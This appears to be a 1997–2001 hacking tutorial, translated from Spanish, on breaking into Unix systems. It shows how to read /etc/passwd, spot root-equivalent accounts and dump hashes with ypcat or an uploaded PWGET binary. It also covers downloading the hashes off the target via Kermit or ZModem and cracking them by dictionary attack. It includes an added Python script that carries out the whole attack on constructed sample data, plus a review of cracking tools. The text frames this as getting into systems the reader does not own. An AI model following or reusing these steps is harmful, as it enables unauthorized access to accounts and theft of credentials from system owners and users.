Cracking Unix Passwords

By Zebal

Translated by ToKsURi

 



Introduction-

To get into a Unix system you need a username and a password, and what better place to find them than /etc/passwd :-) This is the file which holds the list of usernames and passwords on a Unix system, together with other information about each user... The problem is that the passwords are not stored in the clear: the field holds the output of crypt(3), a one-way function, which is what this article means by "encrypted" passwords. Let's see what one of these files looks like:

    root:XY53yyh3gMvvE:0:3::/root:/bin/sh
    daemon:*:1:5::/:/bin/sh
    bin:*:2:2::/bin:/bin/sh
    adm:*:4:4::/usr/adm:/bin/sh
    uucp:*:5:3::/usr/spool/ucppublic:/usr/lib/uucp/uucico
    lp:*:9:7::/usr/spool/lp:/bin/sh
    hpdb:*:27:1:ALLBASE:/:/bin/sh
    user1:g.um3CCF4uVIk:247:25:DArcy Martín:/disc/users/pepito:/bin/csh
    user2:RckFa8/idTCFg:248:24:Billy Corgan:/disc/users/fulanito:/bin/csh
    user3:axX/MxQZr37tA:0:3:James Iha:/disc/users/menganito:/bin/csh

As you can see, each line corresponds to one user and contains, in order, the username, the encrypted password, the user id, the group id, the real name (the GECOS field), the home directory and the shell started at login... The format may change slightly between systems, but basically it is this one. Each field is separated from the next by a colon ":". In some lines the password field is "*". That is not a valid hash: no password produces it, so you cannot log in to those accounts with a password. Another detail to keep in mind is every user whose user id is 0, like root. Those users are root by all means, with the same rights as the real root. As you can see, "user3" has user id 0, which makes it a second root. In a similar way, users whose user id is not 0 but whose group id is 0 get the root group's permissions: not the same as being root, but access to anything the root group may read or write.
 

OK, now we have to "decrypt" the passwords. The problem is that Unix uses a one-way function, crypt(3), so the stored value cannot be decrypted at all. Then... how does login check whether the password is correct? The system runs the password we type through the same one-way function (using the salt stored in the first two characters of the field) and compares the result with the string in the passwd file. If they are identical, the password is correct and the system lets you in. Attacking a Unix passwd file works exactly the way login does: the cracker hashes maaaaaaaaaaaaany words and checks whether any of the results matches an encrypted password in the passwd file. If one matches, we have our password! If not, we go on with the next word. For this we need three things: 1- a word list to hash and check; 2- a list of the encrypted passwords (the passwd file); 3- a program which does all the work.


STEP ONE: Obtaining the Word List

Be creative. You may write your own word list with names, surnames, famous people, numbers, months, rude words, companies, server names and the ever-popular sex, love and god. Anything is valid as long as you think it may be in use as a password on the system you want to hack. Luckily, you may find word lists on the Internet waiting to be tried. One of the most interesting places for obtaining word lists is ftp://sable.ox.ac.uk/pub/wordlists/. It has many word lists, but it is slightly slow. Fortunately, there is a mirror of this server in Spain, at ftp://sun.rediris.es/mirror/sable/wordlists/, which is much quicker, especially if your connection is inside the Spanish network. Anyway, you may always search Yahoo or Lycos for "dictionar" or "wordlis" and you'll find many sites with word lists. A good tip is to try the names and surnames of the users of the system you are trying to crack.... There are maaaaaaany people who use their own name or their girlfriend's name as a password, so a word list built from the users' names and surnames has a good chance of turning up passwords. Another word which is commonly used as a password is the username itself. Many people also use "password". It is a good idea to extract every word in the passwd file and try it as a password. There are many utilities for this, some of them even distributed together with the cracker. I don't think you'll find it very difficult to find a program which extracts the names, surnames and usernames from a /etc/passwd file. There are even utilities whose only function is to build word lists.
 


STEP 2: Obtaining the password list

This is slightly more difficult. If you have an account on the system you want to hack, you may always do a "cat /etc/passwd". If the system does not use shadow passwords or NIS, a list like the one you saw at the beginning will appear. Otherwise, you will see something like this:
 

root:x:0:3::/root:/bin/sh
daemon:*:1:5::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:3::/usr/spool/ucppublic:/usr/lib/uucp/uucico
lp:*:9:7::/usr/spool/lp:/bin/sh
hpdb:*:27:1:ALLBASE:/:/bin/sh
user1:x:247:25:DArcy Martín:/disc/users/pepito:/bin/csh
user2:x:248:24:Billy Corgan:/disc/users/fulanito:/bin/csh
user3:x:0:3:James Iha:/disc/users/menganito:/bin/csh
where the password field will be something like "*" or "x", or anything containing an asterisk "*" such as "*NOPASSWORD*". In this case the file /etc/passwd is of no use, as shadow passwords or NIS is installed. Then you may try "ypcat passwd" (ypcat takes the name of the NIS map, not a path). With this you will probably get the real password list on screen. If you do not have enough rights to run "ypcat", if it is not installed, or if junk appears again, you will have to make use of other programs to obtain the passwords. I recommend PWGET. It is very easy to find: just look for PWGET.TAR.GZ or PWGET.TGZ in any archie, or in Lycos or Yahoo. You will surely find it. Once you have it, you just need to upload it to the server you want to hack, gunzip it ("gzip -d -f PWGET.TGZ"), untar it ("tar -x -f PWGET.TAR"), compile it ("cc -o pwget pwget.c") and run it ("./pwget"), and the password list will appear on screen. If you want the list in a file, just redirect the output into one:

$ ./pwget > file
or else
$ ypcat passwd > file
or else
$ cat /etc/passwd > file
The same way you would redirect output under DOS... Now, to download the file you may use FTP, Kermit, or ZModem/YModem/XModem. To download it via Kermit or ZModem, your telnet program must support these protocols (as NetTerm does), and so must the Unix machine (that is, it has the necessary program installed). Kermit is usually installed on all systems:
$ kermit
kermit> set file type ascii (or "text", depending on the system)
kermit> set send pack 1000
kermit> set rec pack 1000
kermit> set file type 2 (or 3, as you prefer)
kermit> send file

... Download->Kermit

CTRL+C

kermit> quit
$

You may also use ZModem, if it is installed:
$ sz file

... Download->ZModem

$


Step 3: Cracking the password list

Now that you have the password list and several word lists, you need a program which hashes the words and then compares them with the encrypted passwords in the password list. There are many programs you may use. I will briefly comment on the characteristics of these programs (and their names, so that you may look for them on the net), but first I would like to give some tips for obtaining the passwords in less time.
  • Delete from the password file all lines whose password is invalid ("*", "*NOPASSWORD*", etc.).
  • Sort the lines of the password file by the first two characters of the encrypted password (the salt). Some of the programs I comment on do this automatically, but some don't. With these two steps you may save a lot of time, depending on the cracker you use.
  • Users whose password field is empty (user1::101:1:Manolito:/usr/user1:/bin/sh) don't have a password at all, so those are lines you may delete from the file. When you log in, simply typing the username gives you access; and if it does ask you for a password, press ENTER without writing one. :-)
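As an added example (not from the original article or from any of the crackers listed below), here is the whole recipe of steps 1 to 3 and the tips above in one Python script: parse the passwd file, set aside locked and passwordless accounts and flag uid 0, build extra guesses from the usernames and real names, then hash each word once per salt and compare it against every user sharing that salt. Because the crypt module is no longer part of Python, crypt(3) is replaced by a stand-in hash (sha256 mapped onto the crypt alphabet, same 13-character shape); the sample passwd lines, the users' passwords and the small word list are constructed for the demo, and only the salts are copied from the listing at the top of the article.

```python
"""Dictionary attack on a /etc/passwd-style file, following the article's
recipe: parse the file, drop lines that cannot be cracked, build extra
guesses from usernames and real names, then hash each candidate once per
salt and compare it against every user sharing that salt.

crypt(3) is replaced by a stand-in (sha256 mapped onto the crypt alphabet)
because the 'crypt' module is gone from recent Pythons; the attack logic is
the same for the real DES-based crypt(3)."""
import hashlib
import re
from collections import defaultdict

CRYPT_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_RE = re.compile(r"[./0-9A-Za-z]{13}")   # shape of a traditional crypt(3) hash


def fake_crypt(word: str, salt: str) -> str:
    """Stand-in for crypt(3): 2-char salt followed by 11 chars of the crypt
    alphabet. NOT DES; only the one-way property and output shape matter."""
    digest = hashlib.sha256((salt + word).encode()).digest()
    return salt + "".join(CRYPT_ALPHABET[b % 64] for b in digest[:11])


def parse_passwd(text: str) -> list:
    """Return one dict per well-formed 7-field passwd line."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:           # blank or wrapped line: skip it
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "hash": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def triage(entries: list) -> dict:
    """The article's pre-processing: note uid-0 accounts, separate accounts
    with no password, keep only 13-char hashes for the cracker."""
    out = {"root_equivalent": [], "no_password": [], "crackable": [], "locked": []}
    for e in entries:
        if e["uid"] == 0:
            out["root_equivalent"].append(e["name"])
        if e["hash"] == "":
            out["no_password"].append(e["name"])      # just press ENTER
        elif HASH_RE.fullmatch(e["hash"]):
            out["crackable"].append(e)
        else:
            out["locked"].append(e["name"])           # '*', 'x', '*NOPASSWORD*', ...
    return out


def words_from_passwd(entries: list) -> set:
    """Step 1 tip: usernames plus the tokens of the real-name (GECOS) field."""
    words = set()
    for e in entries:
        words.add(e["name"])
        for tok in re.split(r"[\s,]+", e["gecos"]):
            if tok:
                words.update({tok, tok.lower()})
    return words


def crack(entries: list, wordlist, crypt_fn=fake_crypt) -> tuple:
    """Hash every word once per distinct salt and compare it with all users
    sharing that salt. Returns ({user: password}, number_of_hash_calls)."""
    by_salt = defaultdict(list)
    for e in entries:
        by_salt[e["hash"][:2]].append(e)
    found, calls = {}, 0
    for word in wordlist:
        for salt, group in by_salt.items():
            h = crypt_fn(word, salt)
            calls += 1
            for e in group:
                if e["hash"] == h:
                    found[e["name"]] = word
    return found, calls


# Constructed sample, not a real system's file. Hashes come from the stand-in
# so the demo is self-contained; the salts copy the article's listing.
SAMPLE_PASSWD = "\n".join([
    "root:%s:0:3::/root:/bin/sh" % fake_crypt("n0tInL1st", "XY"),
    "daemon:*:1:5::/:/bin/sh",
    "bin:x:2:2::/bin:/bin/sh",
    "user1:%s:247:25:DArcy Martin:/disc/users/pepito:/bin/csh" % fake_crypt("user1", "g."),
    "user2:%s:248:24:Billy Corgan:/disc/users/fulanito:/bin/csh" % fake_crypt("password", "Rc"),
    "user3:%s:0:3:James Iha:/disc/users/menganito:/bin/csh" % fake_crypt("Iha", "Rc"),
    "demo::101:1:Manolito:/usr/demo:/bin/sh",
])

COMMON_WORDS = ["love", "sex", "god", "password", "123456"]   # constructed mini word list


def run_demo():
    entries = parse_passwd(SAMPLE_PASSWD)
    report = triage(entries)
    wordlist = set(COMMON_WORDS) | words_from_passwd(entries)
    found, calls = crack(report["crackable"], wordlist)
    naive = len(wordlist) * len(report["crackable"])   # one hash per (word, user)
    return report, found, calls, naive


if __name__ == "__main__":
    report, found, calls, naive = run_demo()
    print("uid 0 accounts :", report["root_equivalent"])
    print("no password    :", report["no_password"])
    print("cracked        :", found)
    print("hash calls     : %d (one per user would be %d)" % (calls, naive))
```

The hash-call counter shows why the second tip matters: with four crackable users on three distinct salts, each word costs three hash computations instead of four, and on a real file the saving grows with the number of users sharing each of the 4096 possible salts. root stays uncracked because its password is in neither list, which is exactly the "try the next word" case the text describes.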
    CRACKERS:
  • Cracker Jack 1.4 (JACK14*.*, CJACK*.*) It is the most widely used, at least as far as I know. It is on almost every hacking site on the Internet. Works under DOS and OS/2, and is quite fast. The same "distribution" includes many utilities for processing the word list. You may search for it on the web.
  • Brute 2.00 (BRUTE*.*) Another quite popular cracker, despite being so slow. I think there is a faster version, but it uses an encryption algorithm which is not completely correct (although faster), and therefore it doesn't crack all the passwords it should. I haven't found any copy of this version, so I wasn't able to test it. Works under DOS.
  • StarCrack 0.64ß (STARCRAK*.*) A cracker with plenty of options, which allows the words to be manipulated while they are tested. It is quicker than Cracker Jack, works under DOS and is very complete. It is quite new, and also a beta, so I expect a much better version coming soon... :-? Has plenty of options and allows all kinds of things. You can find it at the StarCrack homepage: http://www.chez.com/thes/starcrak.html
  • Hades 1.00a (HADES*.*) Another cracker for DOS. This one works differently from the rest: instead of hashing a word and checking it against the passwords of all users, it hashes all the words and then checks them against the password of one user. Once it has finished with one user, it moves on to the next. Because of this way of working it does far too much disk I/O, which slows down the whole process. Its throughput improves slightly if we sort the password file by the encrypted password field, as then the cracker checks several users at the same time. It can also be improved by keeping all the lists (password and word lists) in memory on a RAM disk.
  • Guess 2.1 (GUESS*.*) Cracker for DOS, extremely slow. It has memory problems if we try to use it with password files of more than 1000 lines.
  • PCUPC 2.01 (PCUPC*.*) Another cracker for DOS. This one has memory problems if we try to crack password files with more than 600/700 lines.
  • Killer Cracker 9.5 (DJKC95*.*, KC*.*) Like Guess, a very slow cracker for DOS which has problems with password files longer than 1000 lines.
  • Xit 2.0 (XIT20*.*) Cracker for DOS. It is the slowest I've found. As its name says, it is a SHIT! :-)
  • HellFire Cracker 1.3 (HC130*.*) Cracker for DOS. Requires a 386 with a co-processor to work, but for some strange reason it hangs on my Pentium and on my 486, so I can't tell you how good it is. Maybe if you have a 386 you'll be able to use it satisfactorily. The program includes a 387 emulator, in case you don't have a co-processor. Anyway, it is a very old program which surely won't be very fast.
  • John the Ripper 1.4 (UCFJOHN3*.*) Cracker for DOS/Win32/Linux and any other system, as it is distributed together with the source code. Works in a similar way to Cracker Jack but includes more options and is quite fast. It is a new release (when this doc was written :) courtesy of UCF (United Cracking Force) and may be a bit difficult to find, but it is really useful and fast. It doesn't have as many options as StarCrack, but is much faster. It even allows many options for processing the word list you use... This is the homepage of John the Ripper: http://www.false.com/security/john/
  • Here you have a table comparing all the different crackers, on the same machine and with the same word and password lists. Some of them took too long and I aborted the cracking process. In these cases I estimated the time they would take to finish from the time run (1 hour) and the number of words checked in that time.
    These are the results, ordered by speed:
     
     
    Cracker                   Time              Checks/second   Comments
    John the Ripper 1.4       6'15''            26667 c/s
    John the Ripper 1.31      6'30''            25641 c/s
    John the Ripper 1.0       8'05''            20619 c/s
    Star Crack 0.64ß          9'15''            18018 c/s
    Star Crack 0.51ß          11'25''           14599 c/s
    Cracker Jack 1.4          13'33''           12300 c/s
    Cracker Jack 1.3 386      14'55''           11173 c/s
    Cracker Jack 1.3 8086     22'22''            7452 c/s
    Hades 1.00a               47'05''            3540 c/s
    Brute 2.00                59'54'' (est.)     2782 c/s
    PCUPC 2.01                135'37'' (est.)    1229 c/s       Only accepts password files shorter than 500 lines
    Guess 2.1                 141'58'' (est.)    1174 c/s       Only accepts password files shorter than 1000 lines
    Killer Cracker 9.5        151'12'' (est.)    1105 c/s       Only accepts password files shorter than 1000 lines
    Xit 2.0                   195'37'' (est.)     852 c/s
    Hellfire Cracker 1.3      infinite              0 c/s       Hung and could not be tested

    This test was carried out on a Pentium 133 with 16 MB of RAM, with all the data on the hard disk, a 2 MB read cache, and without pre-processing the password file or the word list. The word list contained 10 000 words and the password file 1 000 passwords, of which 554 were there to be found. Some programs took too long, so I estimated their time from what they had cracked by the moment I stopped them; therefore I don't know whether they would have found all the passwords. I have included them in the table in case some of you use them. You can now see there are better things!
     

    As you can see, John the Ripper tries almost twice as many passwords per second as Cracker Jack. Note that "c/s" in the table counts word-against-hash checks, not crypt() calls: 10 000 words against 1 000 hashes is 10 000 000 checks, so 6'15'' (375 s) gives 26 667 c/s. I must admit that the file with which I did the testing seems quite favourable to John the Ripper, as 20 000 c/s cannot be obtained very often. Anyway, the comparison is representative of the speed at which each program cracks passwords.


    I hope that with this mini-introduction to the art of cracking Unix passwords you can have a good time, and I also hope that I haven't bored you too much. If you have any question/comment/suggestion/destructive comment, you may send an e-mail to z3b4l@iname.com. Greetings! ;-)

    And for any comment about the translation, you may also send mail to: toksuri@thepentagon.com (don't be too hard with your comments :c)
     






    (C) 1997-2001 by !Hispahack